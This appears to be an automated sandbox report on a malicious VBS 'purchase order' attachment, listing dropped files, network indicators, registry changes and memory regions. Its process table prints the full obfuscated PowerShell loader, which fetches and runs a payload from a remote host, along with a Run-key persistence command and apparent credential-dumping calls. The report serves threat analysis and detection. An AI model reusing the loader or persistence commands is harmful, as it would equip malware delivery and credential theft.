Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs
|
ASCII text, with very long lines (1424), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\kpburtts.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cme3grw1.dw1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvtljbso.0jq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltnwyxaz.yi1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvpnexgb.hba.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv88BF.tmp
|
Extensible storage user DataBase, version 0x620, checksum 0xf147139f, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Kasinoerne.Pri
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187
Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses
philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage
Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter
Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne
Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For(
$Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke(
$Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood
'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0
0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e
mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x.
';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E
ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes
(Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood
',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo
tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N
eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes
(Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood
'.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes
(Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten)
{Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl
e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E
') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s
+ +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes
(Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood
'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT(
$HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn
cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK:
HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes
$Hytteholds;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Sewerage Oplsningsaftenens Skrivebordsteoriers Strubelydene187
Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter Sytjerne Unpurchased Bestte Ligemand Michela enarthroses
philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne Formastelse Kongrespaladss Ophiostaphyle Sewerage
Oplsningsaftenens Skrivebordsteoriers Strubelydene187 Ascon Frilgge Tlsynspligternes Efterskrifter Filterable Afgiftsobjekter
Sytjerne Unpurchased Bestte Ligemand Michela enarthroses philotechnical Patternise Unsaponified31 Svampekosten Miljforbrydelserne
Formastelse Kongrespaladss Ophiostaphyle';If (${host}.CurrentCulture) {$Sulphoacetic++;}Function Ivywood($Oversteges){$Swelly=$Oversteges.Length-$Sulphoacetic;$Undfangelsestidspunkter='SUBsTRI';$Undfangelsestidspunkter+='ng';For(
$Maladministers=1;$Maladministers -lt $Swelly;$Maladministers+=2){$Sewerage+=$Oversteges.$Undfangelsestidspunkter.Invoke(
$Maladministers, $Sulphoacetic);}$Sewerage;}function Unisexes($Dobbelterklringens){ . ($Botanikkerne) ($Dobbelterklringens);}$Fyldepenneblk=Ivywood
'aM.oRz i l lTaR/B5 . 0H A(eWFi n,dFoMwEs, .NTT, ,1B0 .,0 ;O MW,i n,6H4,; xD6S4S;R r vF:K1.2 1R. 0L)d ,G,eHc.kAo,/.2.0K1.0
0,1V0 1. SF imrDe fAo x,/a1F2.1J. 0T ';$Kilders=Ivywood 'SURs e,rT- AVgBe n tN ';$Ascon=Ivywood 'RhDt.t p.sR:M/ / c oPn t.e
mCeSgEac. cSo.mC.Od o / N eSwV/ N eaw /.PIuTsCt eAn eP.TlYpPkT ';$Marijanne=Ivywood ' > ';$Botanikkerne=Ivywood '.iPe x.
';$Kandidaternes='Efterskrifter';$Spindelvvs = Ivywood ' e c h.oT %Fa pHpSd.a,tFa.% \ K aNs.i nSoOeUr,n.e ..P r i, ,&H&E
ePc.h oT tB ';Unisexes (Ivywood 'E$Tg l,oPbfa l :,BBe,dMr eNv iCdMeDnAdUe =.(OcKm,d /.c $LSLp,iTn d e,lRv v s ) ');Unisexes
(Ivywood ',$ g.l o,bCa l,: SOt r ubb e,l yBd e nLe 1.8,7 =s$,Ads c.o,nT..s pBlMi.t ( $ M.aCr.iSjOa n.n ef)O ');Unisexes (Ivywood
',[rN e tS.ESSeGr.v i c eRP,o.iFnktUM.a nSa.g e rM]E:T: SpeEcBu rUiAt,ySPMr,oTtUoGcAo l ,=M [kN,eAtE.SS.e c u rUiEt ymPCrSo
tSoAc oDlTTOyPpUeT].:,:BTElFsg1S2B ');$Ascon=$Strubelydene187[0];$Utilitarianises= (Ivywood '.$,g l o.b aFlI:CCToLrStniMcTiPpBeHtRaVlS=.N
eywH-SO bBjFeMc t. AS,y,sCtPe.m . N e t .RWMeHbUCMl,i,ern t');$Utilitarianises+=$Bedrevidende[1];Unisexes ($Utilitarianises);Unisexes
(Ivywood ' $KCRo r t,iAc i pSe t,aVlS.FHVePa.d,eSr s [,$AK ibl dSe r s ]K=.$ F y.l,d ePp,e n nme bSlSk, ');$Confrere=Ivywood
'.$.C oTr tSiWcSiHp.e,tEa lG.CD o wFn,l ooa.d F i l.e.( $NAUs,c,o nB, $ FPoJr,m,aMs.t,e.lUsSeP)P ';$Formastelse=$Bedrevidende[0];Unisexes
(Ivywood 'O$,g,l.o bBa lU:DV i r iRlLi tGedtReLn =K(.Tfe,s tI-CPAa tEhD S$SFRogrTmHa s tneWlVsEeT)F ');while (!$Viriliteten)
{Unisexes (Ivywood '.$pgNlOo braAl,:PBNiMdne nPtDe d =W$ t.rMuNeN ') ;Unisexes $Confrere;Unisexes (Ivywood ',SBtMa r,tS- SKl
e eUpD .4m ');Unisexes (Ivywood ' $AgBl.o.b.aTl : VSi.rDi l iHt,e t.eQnT=A(DT eVsTtU-.P,a toh, ,$DF,oTr,m aPsGt.e lTsue.)E
') ;Unisexes (Ivywood ' $,g.l otb aRlt:.S k r iFv.eHb oNr dcs t,e o rPi,e rPs.= $ g,l.oSbCa lH: O pGlAs,n i nDgKsAaHf tFeKnFeMn.s
+ +D% $ SKtSrWuSbQeBlCy dKeUnOe.1 8b7S..cCo uLnSt ') ;$Ascon=$Strubelydene187[$Skrivebordsteoriers];}$Omnivoracity=340878;$Lehrman=25696;Unisexes
(Ivywood 'C$ g lSoBb aXlE:,FCi,l tGe,rSa.bIl e, =U KGDe.t -UCDo nUtFe.nAt t$HFLo r mMa sTtIeDl,s e ');Unisexes (Ivywood
'I$.gElDo.b,aPlT:.KCu nPsGtTkPr iFt iFkNe rTeCnBs, I=O [ S yNs t.e,m .FC o.nAv e r tS].: :HFRr oSm BSaPsLeA6R4FSFtSr i,nAgT(
$HF iGlRtKeSrVa,b.l eT)R ');Unisexes (Ivywood ' $Cgcl o,bAa,l : USn p uTr.cIh aSs,eHdP ,=T [MS.yDs.tVeCmT. TleAxStP..ESn
cRo d i.nIg.] :.: A SUCMI I..RG,eMt SRt r iAn g,(B$BKPu n,sUt k r iPtKi.kGeFrSeKnSs )M ');Unisexes (Ivywood 'C$,g,lDoSb aTlK:
HSyTtUt e hRo.lidDsA=K$HU nEpTuHr c h aFsBe d .Ps u.b.sftSr iSnMg.(,$FONm,nPi vKo r a c.iFtEy ,A$PLTeEhMr m a n )B ');Unisexes
$Hytteholds;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kasinoerne.Pri && echo t"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet"
/t REG_EXPAND_SZ /d "%Hippenes% -w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\osoptnuuxvymkrhp"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zubatgfwldqymxdteee"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bohsuyqpzlidxdrfvpzguz"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Likvidationsprovenuet" /t REG_EXPAND_SZ /d "%Hippenes%
-w 1 $Ellis=(Get-ItemProperty -Path 'HKCU:\Redistributing\').Katalognavnet;%Hippenes% ($Ellis)"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
janbours92harbu02.duckdns.org
|
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://contemega.com.do/New/
|
unknown
|
||
|
https://contemega.com.do/New/New/P
|
unknown
|
||
|
http://geoplugin.net/json.gpVp
|
unknown
|
||
|
https://contemega.com.do/New/New/Pustene.lpk
|
192.185.112.252
|
||
|
http://crl.microsoft
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://contemega.com.d
|
unknown
|
||
|
https://contemega.c
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contemega.com.do/New/New/Pu
|
unknown
|
||
|
https://contemega.com.do/N
|
unknown
|
||
|
https://contemega.com.do
|
unknown
|
||
|
http://geoplugin.net/json.gpIp
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://contemega.com.do/New/New/Puste
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
https://contemega.com.do/New/New/Pus
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://contemega.com.do/
|
unknown
|
||
|
https://contemega.com.do/New/New/Pustene.lp
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
|
unknown
|
||
|
https://contemega.com.do/New/New
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.microsoft.co0
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contemega.com.
|
unknown
|
||
|
http://geoplugin.net/json.gp%p
|
unknown
|
||
|
https://contemega.com.do/New
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://contemega.com.do/New/New/Pustene.lpkXR)l
|
unknown
|
||
|
http://www.microsoft.c
|
unknown
|
||
|
https://contemega.com.do/New/N
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
https://contemega.com.do/New/New/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://contemega.co
|
unknown
|
||
|
https://contemega.com.do/New/New/Pustene.
|
unknown
|
||
|
https://contemega.com.do/New/New/Pustene.lpk0z
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
https://contemega.P
|
unknown
|
||
|
https://contemega.com.do/New/New/mVbkq170.bin
|
192.185.112.252
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://go.mic
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.imvu.compData
|
unknown
|
||
|
http://microsoft.co
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
|
unknown
|
||
|
https://contemega.com.do/New/New/Pust
|
unknown
|
||
|
https://contemega.com.do/Ne
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://contemega.com.do
|
unknown
|
||
|
http://geoplugin.net/json.gp.p
|
unknown
|
||
|
https://contemega.com.do/New/New/Pustene.l
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://contemega.com.do/New/New/Pusten
|
unknown
|
||
|
https://contemega.com.do/New/New/Pustene
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://contemega.com.do/New/Ne
|
unknown
|
||
|
http://geoplugin.net/json.gpal
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://contemega.com.do/New/New/mVbkq170.binN
|
unknown
|
||
|
https://contemega.com
|
unknown
|
||
|
http://crl.micros
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 69 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
janbours92harbu02.duckdns.org
|
206.123.148.194
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
contemega.com.do
|
192.185.112.252
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
206.123.148.194
|
janbours92harbu02.duckdns.org
|
United States
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
192.185.112.252
|
contemega.com.do
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Redistributing
|
Katalognavnet
|
||
|
HKEY_CURRENT_USER\Environment
|
Hippenes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-LDOW5Q
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-LDOW5Q
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jmoughoe-LDOW5Q
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Likvidationsprovenuet
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
9D33000
|
direct allocation
|
page execute and read and write
|
|
|
|
50D0000
|
heap
|
page read and write
|
|
|
|
4633000
|
remote allocation
|
page execute and read and write
|
|
|
|
50D0000
|
heap
|
page read and write
|
|
|
|
50D0000
|
heap
|
page read and write
|
|
|
|
5321000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
1326F8B7000
|
heap
|
page read and write
|
||
|
20F50000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
2AEC000
|
stack
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
1326F8E8000
|
heap
|
page read and write
|
||
|
532C000
|
heap
|
page read and write
|
||
|
5342000
|
heap
|
page read and write
|
||
|
20EA0000
|
direct allocation
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
1326F860000
|
heap
|
page read and write
|
||
|
315D000
|
stack
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
1006FE000
|
stack
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
355F000
|
stack
|
page read and write
|
||
|
5170000
|
heap
|
page readonly
|
||
|
1326F926000
|
heap
|
page read and write
|
||
|
5329000
|
heap
|
page read and write
|
||
|
13271337000
|
heap
|
page read and write
|
||
|
532D000
|
heap
|
page read and write
|
||
|
206D0000
|
heap
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
1DBAE389000
|
heap
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
1DBAE387000
|
heap
|
page read and write
|
||
|
532F000
|
heap
|
page read and write
|
||
|
5348000
|
heap
|
page read and write
|
||
|
1326F94F000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
511F000
|
heap
|
page read and write
|
||
|
1CAD5BE000
|
stack
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
27762D00000
|
heap
|
page read and write
|
||
|
20FC8000
|
heap
|
page read and write
|
||
|
1326F917000
|
heap
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
8A90000
|
trusted library allocation
|
page read and write
|
||
|
50C5000
|
heap
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
27763015000
|
heap
|
page read and write
|
||
|
533F000
|
heap
|
page read and write
|
||
|
1DB9409C000
|
heap
|
page read and write
|
||
|
201A0000
|
direct allocation
|
page read and write
|
||
|
3120000
|
heap
|
page readonly
|
||
|
5344000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
314F000
|
unkown
|
page read and write
|
||
|
32AC000
|
heap
|
page read and write
|
||
|
1326F928000
|
heap
|
page read and write
|
||
|
31F0000
|
trusted library allocation
|
page read and write
|
||
|
201D0000
|
direct allocation
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4F65000
|
trusted library allocation
|
page read and write
|
||
|
1DB96596000
|
trusted library allocation
|
page read and write
|
||
|
1326F903000
|
heap
|
page read and write
|
||
|
1DB97BD2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
533B000
|
heap
|
page read and write
|
||
|
1DB93F60000
|
heap
|
page read and write
|
||
|
5E39000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DB95BA0000
|
heap
|
page read and write
|
||
|
1326FB3C000
|
heap
|
page read and write
|
||
|
7440000
|
heap
|
page read and write
|
||
|
75BE000
|
stack
|
page read and write
|
||
|
7890000
|
heap
|
page execute and read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
13271346000
|
heap
|
page read and write
|
||
|
2DB6000
|
stack
|
page read and write
|
||
|
1DB963DE000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3479B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34836000
|
trusted library allocation
|
page read and write
|
||
|
27763010000
|
heap
|
page read and write
|
||
|
329D000
|
heap
|
page read and write
|
||
|
5344000
|
heap
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
2C3D000
|
stack
|
page read and write
|
||
|
1326F902000
|
heap
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
27762CD0000
|
heap
|
page read and write
|
||
|
75E2000
|
heap
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
1326F946000
|
heap
|
page read and write
|
||
|
1000F9000
|
stack
|
page read and write
|
||
|
2E8E000
|
unkown
|
page read and write
|
||
|
511C000
|
heap
|
page read and write
|
||
|
532A000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
535D000
|
heap
|
page read and write
|
||
|
8AE0000
|
direct allocation
|
page read and write
|
||
|
217E0000
|
heap
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
13271323000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
7FFD3493A000
|
trusted library allocation
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
1326F926000
|
heap
|
page read and write
|
||
|
1DB9658A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
|
1326F909000
|
heap
|
page read and write
|
||
|
1326F810000
|
heap
|
page read and write
|
||
|
C38A0FF000
|
unkown
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
5379000
|
heap
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
1326F947000
|
heap
|
page read and write
|
||
|
1326F912000
|
heap
|
page read and write
|
||
|
50A3000
|
heap
|
page read and write
|
||
|
533C000
|
heap
|
page read and write
|
||
|
21259000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
78D000
|
stack
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
20100000
|
direct allocation
|
page read and write
|
||
|
31A5000
|
heap
|
page read and write
|
||
|
212F1000
|
heap
|
page read and write
|
||
|
2C1E000
|
stack
|
page read and write
|
||
|
1326F8FB000
|
heap
|
page read and write
|
||
|
5386000
|
heap
|
page read and write
|
||
|
1326F92C000
|
heap
|
page read and write
|
||
|
1DBAE364000
|
heap
|
page read and write
|
||
|
1DB95C43000
|
heap
|
